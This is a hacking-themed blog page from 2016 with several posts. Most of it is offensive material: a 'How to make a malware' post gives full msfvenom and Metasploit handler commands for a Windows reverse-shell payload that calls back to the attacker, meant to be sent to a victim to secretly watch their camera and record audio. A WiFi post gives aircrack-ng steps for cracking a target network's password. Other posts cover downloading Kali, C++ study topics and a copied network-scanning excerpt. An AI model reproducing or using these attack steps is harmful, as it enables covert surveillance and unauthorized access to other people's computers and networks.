We are legion, for we are many.

Monday, July 11, 2016

How to Download Kali linux.

5:44:00 PM Posted by Unknown No comments
Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools aimed at various information security tasks, such as  Penetration Testing, Forensics and Reverse Engineering.
Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

Kali Linux was released on the 13th March, 2013 as a complete, top-to-bottom rebuild of BackTrack Linux, adhering completely to Debian development standards.
You can download kali at :
https://www.kali.org/downloads/

Download the iso file for virtual box you can choose between the 64-bit or the 32-bit one.
You can download it very easy so enjoy and see you later bye.

Sunday, July 10, 2016

100% Effective way to master C++. [For a Post-beginner person]

5:40:00 PM Posted by Unknown No comments
C++ is a OOP i.e, it is a object oriented programming language developed by Bjarne Stroustrup,and is just another extension of C language. For programming you will first need to have a good idea on what and how to program beautifully. Let us imagine a building the building will be very strong if it's foundation is very strong, this foundation is C language then after comes C++ then Python and so on and so forth. So today I'll be giving tips on how to Understand C++. I chose C++ becausse Its the only programming language i'm practicing at the moment. So please bear with me, if you want tips on any other language please comment below. Alright now lets get to it.
THESE ARE THE BASICS :
1. Various uses of the 'const' keyword and its liberal use.
2. C++ references, const references and temporaries.
3. Basic class syntax, difference between public, protected and private inheritance and *virtual functions*.
4. How the constructor and destructor work, their relation to definition scope for C++ objects on stack, and to the new and delete operators for C++ objects on the heap. The importance of virtual destructors.
5. Default initialization vs value initialization.
6. Copy constructor, assignment operator, nothrow swap.
7. Understand and adopt Resource Acquisition is Initialization (RAII).
8. Operator overloading - especially chaining of overloaded operator calls.
9. What "new operator" and "delete operator" do, and their distinction from "operator new" and "operator delete". Also the different variants of new and delete, including placement new.
10. Exceptions, how to use them efficiently and unobtrusively.

STL + More advanced stuff


11. Rules for overload resolution and what leads to hiding of functions / data in a class or its base classes.

12. Get a basic hang of templates and terminology surrounding them: class template vs template class, template id, template parameter vs template argument, function template. Understand template specialization and partial template specialization. Understand overload resolution between non-template and template functions.
13. Advanced class design techniques - Pimpl idiom, proxies (e.g. smart pointers), private inheritance and template method pattern. Rule of Three, Rule of Zero.
14. STL: different classes of objects - containers, iterators, algorithms, functors, container adaptors, iterator adaptors, functor adaptors.
15. STL dos and don'ts. Understand how to perform specific operations on specific containers e.g. deleting elements from sequence containers vs associative containers.
16. Basic understanding of the iostream facility: the class hierarchy, role of streams and streambuffer classes, manipulators.
17. Namespace, argument dependent lookup (Koenig lookup), its implications.
18. Copy elision and return value optimization.

C++ 11 stuff

19. auto: use the auto keyword in its new avatar liberally to spare yourself from having to type ugly, convoluted, nested typenames.
20. rvalue references, move constructors, perfect forwarding, move iterators: I wouldn't be overstating things if I said, you'd be halfway through C++ 11 by getting a grip on just this one topic. There is an immense amount of subtlety in this topic - and enough reason to hate C++ for it. And yet this is the one facility that drives a lot of the other new features, especially in the STL containers and generally in allowing for more efficient semantics in class interfaces.
21. initializer lists: very useful stuff.
22. range based for-loops: lets you write neat loops around containers.
23. lambda functions: very useful if you know when to deploy and how to format lambdas right. Can become unreadable junk if you don't.
24. STL containers: forward_list (singly linked list), unordered_set (hash table)/unordered_map (hash based symbol table), emplace / emplace_back methods in sequence containers, move_iterators.
25. Ratio and Chrono libraries.
26. Concurrency and atomics: big topic. Worth getting familiar with how you could port your existing Win32 or pthreads code to C++ 11. But there is much more to this library - including atomic data types and operations, futures and promises.

Really useful Boost libraries

Boost Any
Boost Variant
Boost Exception
Boost Regex
Boost Range
Boost Bimap
Boost DateTime
Boost Filesystem
Boost Thread
Boost Coroutine
Boost Asio

Boost Phoenix

Boost MPL
Boost Spirit
Boost Fusion
Boost Xpressive

How to make a malware.

7:39:00 AM Posted by Unknown No comments
HEYYYYYY GUYSSSSS!!!! WHAT IS UPPPPP!!!!!?????? Today I'm in a very good mood because...because, ohhh I don't know.
So lets get to it today I'll be teaching you how to make a malware using metasploit.
Metasploit actually is a software that is used to make and exploit codes against a remote machine.  We'll be using this to make a malware program that can be used to look through the victims camera and record through his recorder without him knowing it. It can be used in many other ways. But today we'll be sticking to malware creation.
Okay first thing you'll be needing is kali linux for this hack.
before you start, open terminal in kali linux and type in ifconfig then copy your ip address
So let's get down to it:


  1. Open up terminal and type in "msfpayload or msfvenom windows/meterpreter/reverse_tcp LHOST=paste your ip address here LPORT=4444 X>/root/filename.exe"
  2. To verify the exe file go to home and you'll see your file there
  3. Now to set up the listener.
  4. Open up another terminal and type "msfconsole".
  5. Type "use exploit/multi/handler".
  6. "set LHOST your ip address here".
  7. "set LHOST 4444"
  8. "set PAYLOAD windows/meterpreter/reverse_tcp"
  9. "exploit".
And thats it, now all you have to do is to send the file to the victims computer an have them open it. After they do you'll see some codes appear on the screen to look at what you can do now type in help and look at the options available.
That is all for Todays Tutorial. Thank you for visiting and please dont forget to share this blog with your friends and on social media, I'd really like it if you'd all help me in increasing the traffic of this blog because it would be much more fun if more people saw my content. If the traffic of this blog keeps on increasing I'll be uploading some kickass posts so thank you once again and bye bye!!

How to know if your internet is hackable?

12:33:00 AM Posted by Unknown No comments
Cracking wifi passwords can be really tough but with the right guidance you can master it in no time. So, today I'll be teaching you how to hack wifi using kali linux.
The required accessories for this tutorial are:-


  • Kali linux.
  • A wireless adapter.
  • A very very good word list.
So after you have all these required items lets get to work.




  1. Open up you terminal and type "ifconfig"(without the quotations)
  2. If your adapter is woring fine you should see wlan0
  3. To start monitor mode type "airmon-ng start wlan0".(without the quotations)
  4. After you enter the code you will see a list of active processes, kill all these processes because they will trouble us later. kill them by typing "kill <process>" there will be two columns on the left will be numbers and on the right will be alphabets.  If on the left there is 804 and on the right there is networkmanager type "kill 804" to kill the process.
  5. To show the list of available WiFi network types, type in "airodump-ng wlan0mon".
  6. Start capturing the packets of your target network
    type the following command;
  7. airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon i.e:  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon 
  8. Stop the capturing using ctrl+c and type "ls" that would bring up all the current directories and files. Select the one with ".cap" extension and type the following command:\
  9. aircrack-ng -w <full location of word list> <name of the file>
Wait till it searches the wordlist for the passcode, if the passcode is present within the wordlist the output will give you the password or it will keep on searching.
Thank you guys for visiting and have a wonderful day ahead. And please do follow me on instagram and snapchat. 

What is discovery scanning?

12:05:00 AM Posted by Unknown No comments
Discovery scanning is the process of identifying live hosts on a network. In the context of
penetration testing, this is usually performed to identify potential targets for attack. The
objective here is not to exhaust resources in gathering information about targets, but instead,
to merely find out where the targets are logically located. The final product of our discovery
should be a list of IP addresses that we can then use for further analysis. In this chapter, we
will discuss how to discover hosts on a network by using protocols operating at layer 2, layer 3,
and layer 4 of the OSI model. The following tutorials will include each of the following recipes:
#Using Scapy to perform layer 2 discovery
#Using ARPing to perform layer 2 discovery
#Using Nmap to perform layer 2 discovery#Using NetDiscover to perform layer 2 discovery
#Using Metasploit to perform layer 2 discovery
#Using ICMP ping to perform layer 3 discovery
#Using Scapy to perform layer 3 discovery
#Using Nmap to perform layer 3 discovery
#Using fping to perform layer 3 discovery
#Using hping3 to perform layer 3 discovery
#Using Scapy to perform layer 4 discovery
#Using Nmap to perform layer 4 discovery
#Using hping3 to perform layer 4 discovery
Discovery Scanning
46
Prior to addressing each of these scanning techniques specifically, we should first address a
few underlying principles. The Open Systems Interconnection (OSI) model is an International
Organization for Standardization (ISO) standard that defines how networked systems
communicate. This model is divided into seven layers that define how application content can
be sent by one system and/or received by another. The upper layers of the OSI model tend to
be more visible to the end user, whereas the lower layers operate transparently to most casual
users. These layers consist of the following:
OSI model Layer description Protocols
Layer 7 – Application This layer involves the application software that
is sending and receiving data
HTTP, FTP,
and Telnet
Layer 6 – Presentation This layer defines how data is formatted
or organized
ASCII, JPEG, PDF,
PNG, and DOCX
Layer 5 – Session This layer involves application session control,
management, synchronization,
and termination
NetBIOS, PPTP,
RPC, and SOCKS
Layer 4 – Transport This layer involves end-to-end
communication services
TCP and UDP
Layer 3 – Network This layer involves logical system addressing IPv4, IPv6, ICMP,
and IPSec
Layer 2 – Data link This layer involves physical system addressing ARP
Layer 1 – Physical This layer involves the data stream that is
passed over the wire
The lower layers of the OSI model are largely used to ensure that network traffic successfully
arrives at its intended destination. Many of the commonly used protocols at these lower
layers necessitate a response from the destination system and, as such, can be leveraged
by potential attackers to identify live systems. Techniques discussed in the remainder of this
section will leverage layers 2, 3 and 4 protocols to discover live network systems. Prior to
addressing each of the specific recipes, we will briefly discuss the protocols used and how
they can be leveraged for discovery.
The pros and cons of layer 2 discovery with ARP are as follows:
***Pros:
‰‰ Very fast
‰‰ Highly reliable
***Cons:
‰‰ Cannot discover remote systems (non-routable protocol)

Saturday, July 9, 2016

Somethings you should know before you start hacking.

11:22:00 PM Posted by Unknown No comments
Hey anonymousa's how's your day going?? I hope it's going fine cuz if not ,boo hoo.
Alright so today I wont be giving off anything new just some things what you might need for further hacking's.
Hacking is just like cooking you take raw materials and make them into something wonderful. Hacking is not just kitty copying code and showboating to your relatives what you can do, its much more than that. You have to be creative with what you have and make the material offered to you work at your whim. 
So before hacking, we all have to make a  friendly environment in the computer system.
Things you'll need for the following tutorials:
  • An OS that supports pen testing  like backtrack or kali linux. I prefer to use kali linux because it has many applications that we'll need for pentesting.
  • A wireless network adapter if you're using kali on VMware or Virtual Box.
  • Approval from whoever you're doing these tests on.
That's about it for what you'll need.
So after you've got all the necessary items go to other blogs that I'll be posting so you get to enjoy the magic of hacking.
Note: The information's that I post here are meant for educational purposes only and I'll not be taking responsibility for the misuse of the information's given here. This goes for all the blogs that I post here.